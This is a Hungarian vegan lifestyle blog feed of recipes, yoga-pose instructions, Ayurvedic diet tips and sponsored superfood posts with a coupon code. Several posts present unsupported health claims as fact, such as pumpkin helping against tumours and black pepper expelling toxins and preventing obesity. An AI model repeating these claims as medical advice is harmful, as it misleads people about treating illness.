Ugyanakkor soha nem mondom senkinek, hogy ne egyen húst, még a feleségemnek sem mondtam soha, (ő egyébként pár hónapja vegetáriánus lett, rajtam kívülálló okokból) viszont Gandhi következő gondolatát komolyan vettem: “Te magad légy a változás, amit látni szeretnél a világban!”
…és végül egy gondolatban összesűrítve:
Azért vagyok vegán, mert tőlem telhetően a legkevesebb élőlény szenvedését és halálát szeretném létrehozni azzal, hogy velük élek.
Ez foglalja össze legjobban egy mondatban amiért így cselekszem.
Vegan "turos taska"
2015. november 16. Mindennapi ételeink
Hozzávalók: 50 dkg finomliszt 10 dkg kókuszzsír 2,5 dkg élesztő 2 dl rizstej 3 ek. eritritol 1 ek. barna nádcukor 1 mk. só -- 15 dkg köles 5 dl rizstej 1 marék mazsola kb. 10 dkg nyírfacukor 1 citrom leve Elkészítés: A lisztet és a kókuszzsírt elmorzsoljuk, a barna cukros tejben felfuttatjuk az élesztőt, majd hozzáadjuk a liszthez, még édesítjük eritritollal és dagasztást követően 30 perc alatt duplára kelesztjük. Ez idő alatt elkészítjük a kölestúrót: megfőzzük a kölest, majd édesítjük, ízesítjük. Hagyjuk kihűlni. A tésztát lisztezett felületen kinyújtjuk (ujjnyi vastagságúra), kockákat vágunk belőle, megtöltjük kölestúróval, behajtjuk és lisztezett, olajozott tepsiben 180 fokon kb .30 perc alatt kisütjük.
A sütőtök hatásai
2015. november 16. Élj harmóniában
A sütőtök nagyon népszerű étel az őszi és téli időszakban. Kedvezően hat az egészségre, ízletes és elérhető az áron tudjuk beszerezni:) Nagyon sok ásványi anyagot, vitamint és nyomelemeket tartalmaz. Többek között cinket, mangánt, foszfort, C és B vitaminokat, folsavat, kalciumot. Segít a gyulladásos megbetegedéseknél, nagyon jó nyálka hártyagyulladásra. Magas az antioxidáns tartalma. Ezért daganatos megbetegedések esetén is jó és erősíti az immunrendszert. Ez utóbbi az őszi, téli időszakban nagyon hasznos. Jótékony a megfázásnál is. Kedvezően hat a köhögésre és a tüdő problémákra, asztmásoknak, allergiásoknak kifejezetten ajánlott a rendszeres fogyasztása.. Széppé teszi a bőrt. Még az égési sérülések regenerálódásában is jótékony. Magas kálium tartalmának köszönhetően természetes vízhajtó és vérnyomáscsökkentő is. Javítja, serkenti az emésztést és segít a koleszterinszint normalizálásában. Kedvezően hat az idegek működésére. Vegyszermentes (bio) sütőtököt fogyassz!
Mama csíkos kalácsa reformosan (vegán)
Gyerekkorom íze köszön vissza a kalácsot kóstolva, amelyet itt Angliában is elkészítettem, mivel annyira kívántam egy kis hazai ízt. Ha lenne is itt hasonló étel a boltokban (eddig nem láttam), akkor sem hiszem, hogy boldogan és nyugodtan venném meg. Ki tudja, milyen mesterséges színezék, ízfokozó és társai gazdagítják. Itt, Londonban, nincs kenyérsütő gépem, s anélkül is könnyen sikerült elkészítenem a kalácsot. Most kakaóval készült, mivel karobot sem fedeztem még fel a boltokban (csak keményre száradt szentjánoskenyeret láttam egy-két helyen, amit viszont még őrölni, darálni kellene). Legközelebbi csomagban, amit kihozok, vagy kijuttatok, biztos lesz karob is. No meg azért is kakaót használtam, mert a lakóközösségnek is jutott egy-két szelet. Ők édesebben fogyasztják az ételeket, s persze nem a reformos, sőt vegán ízekhez szoktak, ezért igyekeztem édesebbre készíteni.
A recept:
Hozzávalók:
- 3 evőkanál instant élesztő (múltkor porélesztő volt, most instant, amit a meleg cukros tejben úgy működött, mint a friss élesztő otthon)
- 2,5 dl meleg szójatej (Itt a lidl-ben szoktam venni, 0.69 fontért, átszámolva, kb. 300 forint egy liter.)
- 15 dkg teljes kiőrlésű liszt
- 25 dkg fehér liszt (BL-55)
- 1 dl zabpehely
- 1 dl víz
- 1 kávéskanálnyi só
- 10 dkg gyümölcscukor (vagy nyírfacukor vagy ki mivel édesít, itt alternatív édesítőszerként még csak gyümölcscukrot fedeztem fel)
- 1 rúd kikapart vanília (opcionális)
- 2-3 evőkanál kakaó
- 2-3 evőkanál olaj
Elkészítés:
Fogunk egy nagyobbacska tálat, amibe a 3 evőkanál instant élesztőt szórjuk. Tűzhelyen megmelegítjük a szójatejet (ne mikróba). Az élesztőt meghintjük egy kevés cukorral, majd a kellemesre felmelegedett tejet ráöntjük. Amíg várjuk, hogy felfusson az élesztő, elővesszük a többi hozzávalót. A zabpehelyre ráöntjük a vizet és várunk, míg magába szívja (ez képes a tojást helyettesíteni).
Mikor feloldódott az élesztő, a fenti sorrendben hozzáadjuk a többi anyagot is, kivéve a kakaóport. Először fakanállal összekeverjük, majd kezünkkel jól átgyúrjuk. Ha túl száraz lenne, egy kevés szójatejet vagy vizet öntünk hozzá, ha túl nedves, kevés lisztet szórunk a tetejére.
Ha kis gömböccé állt össze, meleg helyen lefedve pihentetjük kb. 45-60 percet. Amikor megkelt a tészta, kivesszük, elfelezzük és az egyik feléhez keverünk kakaót valamint egy kevés gyümölcscukrot. A megkelt tésztákat lisztezett deszkán vagy munkalapon kinyújtjuk, egymásra helyezzük és felcsavarjuk. Ha szükséges, mert a tészta túl nagy a tepsihez, elfelezhetjük őket.
Sütés előtt a tetejét egy kevés olívaolajjal megkenhetjük, fényesebb lesz a héja. 180 fokon sütöttem, kb. 20-30 percet. (Az első rudat tovább, a másodikat rövidebb ideig.) Ha kihűlt, akkor szeleteljük. Remek eledel tízóraira a gyereknek, de hétvégi ebédünket is lezárhatjuk vele. Délutáni uzsonna vagy teázás édes kísérője lehet. Karácsonyra vagy más családi ünnepre is megsüthetjük.
Szuper reggeli: Acai smoothie (vegán) + Kedvezménykupon
2015. november 11. Zizi kalandjai
Folytatódik a sorozat a szuper élelmiszerekről. Egy olyan alapanyagot mutatok be, amelyről már lehet, hogy sokat hallottatok, főleg, ha olvastok angol nyelvű oldalakat, ugyanis az utóbbi időben igen felkapott “gyümölcs” lett. Én már évekkel ezelőtt hallottam róla – az acai bogyóról -, amikor megismerkedtem I.-vel, ugyanis ő eltöltött egy kis időt Brazíliában, ahol ez a gyümölcs őshonos. Ódákat zengett róla, hogy mennyire finom és minden sarkon árulták friss gyümölcsként vagy frissen elkészített gyümölcsléként. Rengeteget ivott acai gyümölcslevet és teljesen beleszeretett… én pedig azóta álmodozom, hogy egyszer én is kipróbálhatom majd a friss változatot.
Az acai (“ászái”) bogyó az Amazonas vidékén tömegesen előforduló Euterpe oleracea pálma termése, amely főleg mocsaras és árteres vidékeken őshonos. Legnagyobb termőterületei Brazíliában és Trinidadban vannak, de előfordul még Dél-Amerika más országaiban is. A bogyók feketéslilák, aprók, kinézetre hasonlatosak az áfonyához (fotókat lásd itt a pálmáról és a bogyókról). Nagy fürtökben nőnek, évente kétszer szüretelhetők. Az acai íze kellemesen savanykás. Nyers formában a brazil bennszülöttek étrendjének egyik fő összetevője, míg őshazáján kívül többnyire gyümölcslé vagy acai por formájában találkozhatunk vele. Egyébként az acai bogyó akkor lett felkapott és akkor vált világhírűvé, amikor dr. Nicolas Perricone beválasztotta a tíz legjobb öregedésgátló csodaétel közé, és leadták Oprah Winfrey egyik műsorban.
Az acai bogyónak alacsony a cukortartalma, viszont igen gazdag értékes zsírokban, ezenkívül magas a rosttartalma. Az acai gazdag ásványi anyagokban, kálciumot, vasat, káliumot és magnéziumot is tartalmaz, valamint sok C- és A-vitamint.
Az acai fagyasztott gyümölcsként vagy fagyasztva szárítva (liofilizálva) por formában jut el Észak-Amerikába, Európába és a többi földrészre. A friss gyümölcspépet addig fagyasztják, míg víztartalma szilárd fázisból közvetlenül gáz fásiba lép. Így őrzi meg a por a lehető legtöbb értékes tápanyagot. A por jól keverhető bármely gyümölcs- vagy zöldséglével. Hozzáadható gyümölcssalátákhoz, süteményekhez, nyers desszertekhez, fagylaltokhoz, mártásokhoz, szószokhoz.
Én most egy egészen egyszerű turmixhoz használtam fel az acait. Krémességét a banán adja, de tehetünk bele avokádót is. Fehérje gazdagításra földimogyoróvajat tettem bele, de jó a mandulavaj, extraként pedig a kesudióvaj is. Feldobhatjuk még valamilyen semleges ízű leveles zölddel is (spenót, mángold, leveleskel) és akkor már tényleg minden benne van, ami egy teljesértékű reggeliben lehet!
Acai smoothie (vegán)
Hozzávalók 3 főre:
– 1 és 1/2 érett banán, meghámozva, felszeletelve
– 3/4 bögre fagyasztott málna
– 2 teáskanál acai por
– 1 evőkanál földimogyoróvaj (mandulavaj is használható)
– 3 evőkanál zabpehely
– 2 evőkanál lenmag vagy chia mag
– 1 és 1/2 bögre mandulatej (rizs-, zab-, kókusztej is használható)
Tegyünk minden hozzávalót a turmixgépbe és pépesítsük simára néhány perc alatt. Ha túl sűrűnek találjuk, adjunk még hozzá egy kis mandulatejet.
Fogyasszuk azonnal! Ne hagyjuk sokáig állni, mert a lenmag besűríti!
Szuper élelmiszer sorozat:
Inka bogyó (inka bogyós datolya golyóként elkészítve)
Más acai receptek:
Kókuszos acai reggeli
Acai smoothie bowl 1.
Acai smoothie bowl 2.
Őszi acai smoothie bowl vaníliás kesudióvajjal
*****
Az acai port a {Planetbio} biztosította a recepthez. A véleményem csakis a sajátom.
Jó hír, hogy a Planetbio felajánlotta, hogy kedvezménykupont biztosít a Zizi kalandjai olvasóinak! Minden online vásárlás végösszegéből 5% kedvezményt nyújt a cég. A kuponkód, amelyet megrendeléskor be kell írni a kedvezmény érvényesítéséhez: ZIZI. Jó vásárlást mindenkinek!
Tégy a gerinced egészségéért! - Uttanászana (állásból előrehajlás)
2015. november 8. Élj harmóniában
Az uttánászana (állásból előrehajlás) egy előrehajlító jógapóz, nagyon hasonlít a pascsimottanászanára (itt olvashatsz róla) - mondhatni annak az álló válto zata. Ez az ászana alaposan megnyújtja a test hátulsó vonalát, hatással van a lábakra, csípőre, gerincre. Rugalmassá teszi a lábakat. M int minden előrehajlító jógapóz, segít átmasszírozni a belső szerveket, ezáltal energetizálja a lépet, májat, gyomrot, beleket. Mivel intenzíven hat az emésztőrendszerre, csökkenti a gyomor panaszokat és segíti a méregtelenítést is. Az ájurvéda még a hasi zsírpárnák eltávolítására is javasolja. Oldja a feszültséget és na gyon jól nyugtatja az idegeket - jól használható stressz esetén. Azáltal, hogy a fej lentebb kerül, serkenti a vérellátásban a fejben, így hatással van az arcbőrre is - kedvezően hat a ráncok kialakulása ellen. Hogyan végezd el? - Kiindulási póznak állj meg Tadászanaban (hegytartásban). - Nyújtozz a karjaiddal a magasba, nyújtsd meg hosszan a gerinced. - Kilégzéssel, egyenes háttal hajolj előre, folyamatosan nyújtózva a karokkal, a hátaddal és a hasaddal is. - A testsúlyodat próbáld egyenletesen eloszlatni a két talpadon (testsúly 3 ponton oszlik el: a nagyujj alatti párnán, a kisujj alatti párnán, és a sarkadon) és próbáld a belboka területét megemelni. - A lábak legyenek aktívan kinyújtva, húzd fel a térdkalácsod a combizmok segítségével. - Húzd be picit a farokcsontot - húzd be a hasad is a köldök alatti rész legyen aktívan megtartott és a farizmokat is picit feszítsd meg. Az ülőcsontokkal dolgozz fölfelé. - A törzsed mindkét oldalát próbáld egyformán nyújtani. - Nyisd ki a mellkasi területet: húzd a vállakat hátrafelé és a medencéd irányába, próbáld távolítani egymástól a kulcscsontokat. A szegycsonttal is próbálj finoman nyújtózni. - Húzd be picit az állad és fejtetővel nyújtózz lefelé. - A két kezed a talajon, a tenyerek párhuzamosan a lábakkal. A kézujjakat terpeszd ki és a középső ujjad legyen középen. - Lélegezz egyenletesen és próbálj a kilégzésekkel egyre mélyebbre menni a pózba. Próbáld legalább 30 -6 0 másodpercig megtartani a póz. A kitartás alatt, belégzéssel nyújtsd a lábakat és a sarkakból emeld az ülőcsontokat. Kilégzéssel nyújtózz fejtetővel lefelé, megtartva a hasat és a hátat. Belégzéssel nyújtózz a szegycsonttal a talaj felé, kilégzéssel tartsd a lapockatájékot és távolítsd a kulcscsontokat. Kijövetel a pózból: kezdőként kilégzéssel csigolyáról, csigolyára gördülj fel, haladókét megtartott hassal és derékkal, nyújtott karokkal is felegyenesedhetsz. Amennyiben a derekad begörbül, esetleg nem éred el a talajt akkor hajlítsd be a térdeket és úgy csináld meg a pózt. tehet akár két jógatéglát - vagy bármilyen segédeszközt pl. széket a kezek alá, a lényeg, hogy ne görbe derékkal, görbe háttal csináld a pózt. Ne végezd a pózt, ha komolyabb derékfájásod van vagy gerincsérved. Akkor se gyakorlod, ha kezeletlen magasvérnyomással küzdesz . V alamint akkor se kivitelezd a pózt ha a fejeden aktuálisan van valamilyen gyulladás - begyu lladt a fogad, arcüreged, etc.
Köles
Egyik kedvenc gabonám a köles, mert egészséges, olcsó, könnyű elkészíteni, és semleges íze miatt jól illik édes és sós ételekhez egyaránt. Textúrája miatt kiválóan alkalmas túró helyettesítésére – tejmentesen. Egészségre gyakorolt hatása Gluténmentes, candida-diétába is beilleszthető, alacsony a kalória- és a magas a rosttartalma. Szabályozza a vércukor- és koleszterinszintet, rendszeres fogyasztása rugalmassá teszi a bőrt, […] The post Köles appeared first on VegaNinja.
Inka bogyós datolya golyó (nyers, vegán) + Kedvezménykupon
2015. november 3. Zizi kalandjai
Többen érdeklődtetek már nálam a szuper élelmiszerekről: mik ezek, én miket használok, hogyan lehet őket felhasználni, stb. A Planetbio-nak hála most többet bemutathatok nektek itt a blogon (sorozatban).
Az angol superfood olyan élelmiszert, ételt jelent, amelyek magas koncentrációban tartalmaznak olyan alapvető tápanyagokat, amelyeknek az egészségre gyakorolt hatásuk kiemelkedő. Legtöbbjük lúgosító és méregtelenítő hatású is. Sokáig azt hittem, hogy a superfood valami különleges élelmiszer, ami nagyon drága és esetleg nehezen is beszerezhető. Rövid tanulmányozás után rájöttem, hogy vannak tasakban és por formájában kapható szuper élelmiszerek (ez a drágább kategória) és vannak a hagyományos zöldség- és gyümölcspulton (avokádó, áfonya, leveleskel, brokkoli, eper, spenót, mandula, quinoa, stb.) kapható friss változatok.
A tasakban és por formában kapható szuper élelmiszereket felfoghatjuk úgy is, mintha kiváló minőségű vitaminok lennének. Nem kell belőlük sokat fogyasztani, azonban hébe-hóba megéri “beruházni” egy-egy fajtára, hogy felturbózzuk velük az immunrendszerünket.
Ennek a mostani receptnek a kiemelt eleme az inka bogyó (szárított formában), de van még benne hántolt kendermag, chia mag, nyers kakaópor, nyers kókuszzsír, na és persze datolya, meg magok, amelyek mind-mind a szuper élelmiszer kategóriába tartoznak. Első kóstolásra bejött az inka bogyó íze (nemcsak nekem, hanem Ádinak is, aki úgy eszi, mintha kötelező lenne ), enyhén savanykás, de közben édes is. Kinézetre a mazsolára hasonlít, kicsit azonban érdesebb a felülete. Peru magasabb területein őshonos, antioxidánsokban gazdag, viszonylag magas fehérje- és rosttartalommal rendelkezik. Gazdag vasban, A- és C-vitaminban.
A golyót a datolya fogja össze. Magok tekintetében azt tettem bele, ami éppen itthon volt, egy kis kesudiót, mandulát és törökmogyorót. Ha éppen diótok van otthon, azzal is elkészíthetitek persze. A puhaságát és “krémességét” a nyers (extra szűz) kókuszzsír adja meg. Ha ilyenetek nincs, használhattok hagyományos kókuszzsírt is, a lényeg, hogy szobahőmérsékletű legyen. A datolya golyó készítés nagyon gyerekbarát művelet. Ádi végig segített nekem: kimérni az alapanyagokat, elindítani a robotgépet, majd megformázni a golyókat, amiből természetesen nem sok minden lett, ugyanis ő folyamatosan ette a kezébe került masszát. A készítés másnapján még volt kb. hét darab golyó. Délután kitettem Ádi asztalkájára, hogy majszoljon belőle egy keveset. Én közben tettem-vettem, majd eszembe jutott, hogy egy utolsó golyót bekapok még mire elfogy. Odamentem az asztalhoz és a golyóknak hűlt helyét találtam… I. egyet evett, a maradék hatot mind Ádi habzsolta be kb. 20 perc alatt! Na ennyire finom! Próbáljátok ki!
Inka bogyós datolya golyó (nyers, vegán)
Hozzávalók (kb. 25 db-hoz):
– 1 bögre kesudió
– 1/2 bögre mandula
– 1/2 bögre törökmogyoró
– 20 szem datolya, kimagozva (lehetőleg friss – Lehel piacon lehet kapni -, ha nem tudtok beszerezni, jó a szárított is, csak jó minőségű legyen)
– 2 evőkanál chia mag
– 2 evőkanál hántolt kendermag
– 2 evőkanál (nyers) kakaópor
– 2 evőkanál (nyers, extra szűz) kókuszzsír
– 1/3 bögre inka bogyó, felaprítva
Tegyük robotgépbe a kesudiót, a mandulát és a törökmogyorót, és daráljuk por állagúra. Ekkor adjuk hozzá a kimagozott datolyát és az összes többi alapanyagot. Addig dolgoztassuk a robotgépet, amíg a massza enyhén ragacsossá (kissé zsírossá a kókuszzsír miatt) válik (állítsuk le a gépet és ellenőrizzük az állagot).
Formázzunk golyókat a masszából. Zárt dobozban, hűvös helyen, hőtőben 10-12 napig eláll (de addig úgysem fog tartani).
*****
A superfood alapanyagokat a {Planetbio} biztosította a recepthez. A véleményem csakis a sajátom.
Jó hír, hogy a Planetbio felajánlotta, hogy kedvezménykupont biztosít a Zizi kalandjai olvasóinak! Minden online vásárlás végösszegéből 5% kedvezményt nyújt a cég. A kuponkód, amelyet megrendeléskor be kell írni a kedvezmény érvényesítéséhez: ZIZI. Jó vásárlást mindenkinek!
Csokiöntet (vegán)
Bármilyen süti, fagyi vagy más édesség tetejére szuperfinom csokisziurup 3 egyszerű összetevőből. Melegen folyik, fagyira csurgatva megszilárdul, és édes, nyúlós masszává válik. Imádom! Hozzávalók: 4 evőkanál főzős kakaópor 4 evőkanál kókuszolaj 1-2 evőkanál vegán “méz” vagy juhar-, rizs-, agavé vagy datolyaszirup A kókuszolajat egy kis lábasban megolvasztom alacsony lángon, majd hozzáadom a szirupot és a kakaóport. […]
Édesburgonyás csokitorta
A Húgom születésnapjára készítettem ezt a nagyon finom csokitortát kedvenc vegán szakácskönyv-íróm Dreena Burton idén megjelent új, családi vegán ételeket összegyűjtő szakácskönyvéből ( Plant-Powered Families ). Nincsen benne semmilyen klasszikus cukorféle és zsiradék sem, mégis azt kell mondjam, hogy a végeredmény nagyon tömény lett, egy szelet belőle bőven elég... :P A krém viszont isteni, önmagában is megállja a helyét akár poharas desszertnek... :) A krémességének titka a kesudió, vagy mandulakrém! Édesburgonyás csokis piskóta (egy kb. 23 cm-es tortaformához, egy darab 1 rétegű tortához; ha két rétegű tortát szeretnél, akkor megduplázhatod az alapmennyiséget a recept szerint) 1 bögre = kb. 250 ml 3/4 bögre meghámozott, megfőtt és kihűtött édesburgonya 1/2 bögre 1/4 bögre juharszirup 1 ek. balzsamecet (nálam citromlé) 2 tk. vaníliakivonat (nálam őrölt vanília) 1 bögre teljes kiőrlésű tönköly (!) liszt 1/3 bögre kókuszvirág cukor 1/4 bögre étcsoki csepp (vagy összetört étcsoki darabok) 1/2 csapott tk. tengeri só 1/4 bögre kakaópor 1 tk. (foszfátmentes) sütőpor 1 csapott tk. sütőszóda (vagy szódabikarbóna) Édesburgonyás csokikrém (kb. 2 + 1/4 bögre krémhez) 1 bögre hámozott, főtt és kihűtött édesburgonya 2/3-3/4 bögre kókuszvirág cukor, vagy más nem finomított cukor 1/2 bögre kakaópor 1/2 bögre natúr kesudió-, vagy mandulakrém 1/4 tk. tengeri só 2-5 ek. növényi tej 1 tk. vaníliakivonat (nálam őrölt vanília) Melegítsük elő a sütőt 180 fokra. Finoman olajozzuk ki a tortaformát kókuszolajjal, vagy más olajjal, és tegyünk a forma aljára méretre vágott sütőpapírt. Konyhai robotgéppel pürésítsük az édesburgonyát, 1/2 bögre vizet, a juharszirupot, a balzsamecetet (vagy citromlevet) és a vaníliát egészen addig, amíg krémes állagú lesz. Egy nagy tálban keverjük össze a lisztet, a kókuszvirág cukrot, a csokicseppet és a sót, majd szórjuk hozzá a kakaót, a sütőport és a sütőszódát. Adjuk a száraz hozzávalókhoz a krémes keveréket és alaposan keverjük össze. Öntsük bele a tortaformába és süssük 21-23 percig, vegyük ki a sütőből és hagyjuk kihűlni egy sütőrácson. Kihűlés után vágjuk fel és kenjük meg a krémmel belül és kívül a tortát. Én a torta tetejét a dr. Oetker fehér dekormix csillagaival díszítettem, amik tejmentesek. Tegyük bele egy konyhai aprítógépbe az édesburgonyát, a kókuszvirág-cukrot, a kakaót, a kesudióvajat, a tengeri sót és 1-2 ek. növényi tejet és a vaníliát. Addig keverjük a géppel, amíg jó krémes lesz! Kóstold meg, és ha édesebbre szeretnéd, adj még hozzá kókuszvirág-cukrot, ha pedig kevésbé sűrű krémet szeretnél, növényi tejjel higíthatod még 1-1 evőkanállal hozzáadva. Tedd bele egy tárolóedénybe és tartsd a hűtőben felhasználásig! TIPP - további ízvariációk: - adj hozzá 1-1,5 tk. reszelt narancshéjat, - adhatsz hozzá 0,5 tk. tiszta mandulakivonatot is, amitől enyhén cseresznyés ízbeütést kap a krém.
Sült édesburgonya céklával
Édesburgonyának hívjuk, pedig a burgonyához nem sok köze van, legfeljebb, hogy gumós növény, de a hajnalka virágokhoz már inkább, mert a hajnalka nemzetségébe tartozik. Batátának is hívják még. Magyarországon már elég elterjedt, nem csak nagyobb szupermarketek zöldséges polcain találkozhatunk vele, hanem bizonyos termelők kertjében is megterem. Angliában szinte minden zöldségárusnál vásárolhat az ember. Általában egy kilónyit 1 fontért adnak. Ha céklánk és egy kis lila hagymánk is van zseniális őszi ételt lehet alkotni belőlük. Az édesburgonya amúgy ízre, színre leginkább a sütőtökhöz hasonlítható. Megtévesztésig hasonló ízű. Vasban, káliumban, A-, B6-, C-vitaminokban gazdag. Nevével ellentétben cukorbetegek is fogyaszthatják, alacsony a glikémiás indexe. Céklával és lila hagymával párosítva egészséges őszi ételben lehet részünk.
A recept:
Hozzávalók:
- 3-4 édesburgonya
- 5-6 cékla
- 2 lila hagyma
- 3-4 gerezd fokhagyma
- kakukkfű
- ételízesítő/só
- víz
- kókuszolaj
- alufólia
Elkészítés:
Az édesburgonyákat és a céklákat megpucoljuk, kockákra vágjuk és külön lábosba, sós vízben feltesszük főzni. Addig főzzük, míg épp egy kicsit megpuhulnak. Közben a hagymákat megpucoljuk, a fokhagymát felaprítjuk, a lila hagymát szeletekre vágjuk. Fogunk egy kisebb tálat, folyékony kókuszolajat, kakukkfűvel, aprított vagy szétpréselt fokhagymával és ételízesítővel összekeverjük, majd hozzáöntünk pár kanál meleg vizet. Ezt a fűszeres lét összekeverjük, majd egy nagyobb tálban az édesburgonyára és a céklára ráöntjük, átkavarjuk, így mehet a zöldség a tepsibe (sütőpapír híján most alufóliát tettem alá), elterítjük benne, a tetejére rászórjuk a lila hagyma szeleteket, majd betesszük sütni. 15-20 perc sütéssel összeérnek az ízek. A kakukkfű a legfontosabb fűszer hozzá. Főtt gabonához is fogyaszthatjuk, vagy ezekhez a sült zöldségekhez valamilyen fasírtot is ehetünk, de magában is nagyon finom.
A feketebors hatásai
2015. október 26. Élj harmóniában
A feketebors az ókortól ismert gyógynövény. Mára már a magyar konyhának is mindennapi fűszere, de kevesen tudják, hogy mennyi fantasztikus hatása van. Ez az egyik legerőteljesebb serkentő, hat a testre és a elmére. A feketebors hatással van az emésztésre, vérkeringésre és a légzésre is. Segíti az emésztést, megakadályozza az elhízást, szélhajtó hatása van, így jó puffadás ellen. Amikor valakinek állandó emésztési problémái vannak, nagyon jó hasznát veheti a feketeborsnak, még a vastagbélben felhalmozódott mérgeket is segít kiűzni, eltávolítja a testből az "ama"-t (azaz méreganyagokat). Féreghajtó hatással is rendelkezik. Nem csak az emésztés, de a légzőszervek megbetegedésénél is hasznát vehetjük. Nyákoldó hatása van és segít a testüregekben lévő pangást megszüntetni. Mézzel fogyasztva nagyon jó köptető, leállítja a váladéktermelést. Enyhe lázcsillapító hatással is rendelkezik. Serkenti a keringést, ezért hideg végtagok esetén is érdemes rendszeresen fogyasztani. Az ájurvédában a trikatu, azaz 3 csípős egyik alkotóeleme - a hosszúborssal és a gyömbérrel együtt. Ne használd akkor, ha az emésztőrendszernek valamilyen gyulladásos megbetegedése van. Vegyszermentes (bio) változatot válassz!
Táplálkozás az őszi időszakban - tanácsok az ájurvéda segítségével
2015. október 23. Élj harmóniában
Mostanra valóban megékezett az ősz, hidegebbre fordult az időjárás, így sajnos egyre kevesebbet tartózkodunk a friss levegőn, csökken a testmozgásra fordított időnk. A hideg azt is hozza magával, hogy megnő az étvágyunk, általában mindenki tartalmasabb és nagyobb mennyiségű ételt fogyaszt a hideg hatására, mely bizonyos mértékig indokolt is. Ilyenkor sajnos nem csak a hideg befolyásolja az étkezéseinket, de a lakásban eltöltött idő is sokszor lehetőséget teremt a plusz kalóriák fogyasztására, nassolásra, csipegetésre, vendégeskedésre, süteménysütögetésre, esetleg nem egészséges és tápláló ételek fogyasztására. A kevesebb testmozgás és a nem egészséges ételekkel bevitt plusz kalóriák súlygyarapodást idézhetnek elő. Célszerű ebben az időszakban kiemelt figyelmet fordítani arra, hogy a táplálkozással erősítsük immunrendszerünket és megakadályozzuk a fölösleges kilók és a méreganyagok felhalmozását. A tápláló, immunrendszert erősítő ételek fogyasztására fektess nagy hangsúlyt, ezek jó egészséget, boldogságérzetet, jó közérzetet kiegyensúlyozottságot eredményeznek. Kerülni kell a szervezetben a salakanyagok felhalmozását, azokat az ételeket és szokásokat, melyek méreganyagokat, azaz "ama"-t termelnek. Ezek elnehezítik a testet, gyengítik az immunrendszert és lehangoltságot eredményeznek. Néhány praktikus táplálkozási tanács, mely hozzájárul, hogy a a hideg időszakban is egészséges, energia dús maradj. Étkezz megfelelő időben és lehetőleg mindig ugyanazon időpontokban. A főétkezés 12:00-13:00 és ez legyen a nap legtartalmasabb étkezése, mert az emésztés tüze (az agni) ilyenkor a legerősebb. Kerüld az a nassolást, ne egyél az étkezések között. Fogyassz friss, tiszta minőségű élelmiszereket. Kerüld el a vegyszeres (nem bio) tartósítószerezett, feldolgozott, génmanipulált, félkész élelmiszereket. Könnyen emészthető ételeket készíts - vegyszermentes (bio) zöldségek, gyümölcsök, tejtermékek, gabonák(teljes kiőrlésű), hüvelyesek. Használj immunrendszert erősítő és emésztést segítő fűszereket (gyömbér, kurkuma, fekete bors, fahéj, édeskömény, római kömény, koriander). Készítsd ghível (tisztított vajjal) az ételeket (ghí elkészítését itt olvashatod), ezs egít erősíteni az emésztésed és táplálja a testet. Ne fogyassz hideg ételeket és hideg italokat, mert a hideg ételek, gyengítik az emésztésed. Egyél olyan friss gyümölcsöket, melyek erősítik az immunrendszered, kiváló választás a körte, alma, szilva Az ételeket főzd meg, de ne főzd túl, mert mindkét esetben gyengítik az immunrendszert. Kerüld el a húsos ételeket, a zsíros és a cukros ételeket, mert gyengítik az immunrendszert. Ne edd magad tele (max 3/4 részig töltsd meg a gyomrod). Ne fogyassz túl sok nyers zöldséget, gyümölcsöt, mert a hideg időjárásban gyengíthetik az immunrendszered és hűtik a tested. Az ételeket rágd meg alaposan. Ne igyál az étkezésekhez túl sok folyadékot, és az elfogyasztott folyadék mindig langyos vagy meleg legyen. Nyugodt körülmények között egyél és az étkezés után ne pattanj fel az asztaltól, várd meg amíg az emésztésed beindul. Kortyolj a nap során meleg vizet, ez nagyon sokat tud segíteni (részletesen az ájurvédikus méregtelenítésről szóló cikkben) A tanácsokat lépésről, lépésre építsd be az életedbe. Kezd el a legegyszerűbbektől és saját tempódban próbáld szokásoddá alakítani. Végül figyeld magad! Figyeld milyen változásokat tapasztalsz, hogyan változik az emésztésed, az energiaszinted, a kedélyállapotod és az elméd békéje.
Reggelire fel! - Szőlős-kendermagos és Csokis-kókuszos chia puding (gluténmentes, laktózmentes, tojásmentes, hozzáadott cukormentes, vegán, nyers)
2015. október 22. Zöld Avocado
szőlős kendermagos chia puding (mindenmentes, nyers, vegán) Mostanában ha nem valami zabból készült reggelit eszünk, akkor chia pudingot. Villámgyorsan elkészíthető, nagyon egyszerű, és pár hozzávalóból mennyei, tápláló és vitalizáló, természetesen gyomorbarát reggelit tudunk készíteni. Mint arról már korábban írtam, a zab egy lassan felszívódó, magas rosttartartalmú, az egészséges életmódhoz szervesen tartozó reggeliző gabona, melyből nagyszerű kásákat, morzsákat, kekszeket, palacsintákat, müzliszeleteket stb. lehet készíteni különféle ízesítéssel. Ez nálunk is így szokott történni azokon a napokon, amikor tudom, hogy az ebéd és a reggeli közt túl sok idő fog eltelni, vagy délelőtt sok energiára, erőre lesz szükségem, zabból készült reggelit fogyasztok. De szerencsére nem mindennap ilyen! ;-) csokis kókuszos málnás chia puding (mindenmentes, nyers, vegán) Sőt! A tél közeledtével egyre több a lusta délelőtt, a lakásban - esetleg ágyban - töltött hosszabb reggelek (főleg hétvégén). Ilyenkor nincs szükség nagy kalóriájú, eltelítő reggelikre. Gyorsan elkészíthető, tápláló és könnyű ételekre vágyunk. Sokáig ellenálltam a nagy chia puding őrületnek, de abban hiszek, hogy egyszer mindent ki kell próbálni, hogy utána véleményt tudjak alkotni róla, így hát egyik reggel a világhíressá vált chia reggeliző puding megérkezett az én konyhámba is... és azóta itt is maradt. :-) Ki ne szeretné a gyors és egyszerű, de mégis változatos ételeket? Hát ez is egy ilyen! Ráadásul sem glutént, sem laktózt, sem tojást, sem hozzáadott cukrot vagy adalékanyagot nem tartalmaz. Ha pedig télen síelésre adnánk a fejünket, és olyan szálláson szállunk meg családdal, ahol nincs tűzhely, akkor is tökéletes reggeli, mert csak összeborítjuk a hozzávalókat, várunk egy kicsit, és már ehetjük is. Ki-ki a saját maga ízesítése szerint. Az alap 3 hozzávalóból áll, és hogy utána milyen idény szerinti gyümölcsöt, olajos magot, szuper ételt, vagy fűszert teszünk hozzá, csak rajtunk múlik! ;-) Akik figyelmesen követik a blogom észrevehették, hogy chia reggelis posztom volt már nem is olyan régen. Korábban már bemutattam nektek itt a Zöld Avocado vegetáriánus gasztroblogon egy fekete áfonyás poharas chia reggelit, ami akár desszertnek is elmegy. Ebben a bejegyzésben olvashattok a chia mag jótékony hatásairól is. Annyira meghatározóvá vált a chia puding élmény a mindennapjainkban, hogy gondoltam még egy posztot megér, hátha valakit majd ezekkel az ízekkel és képekkel sikerül 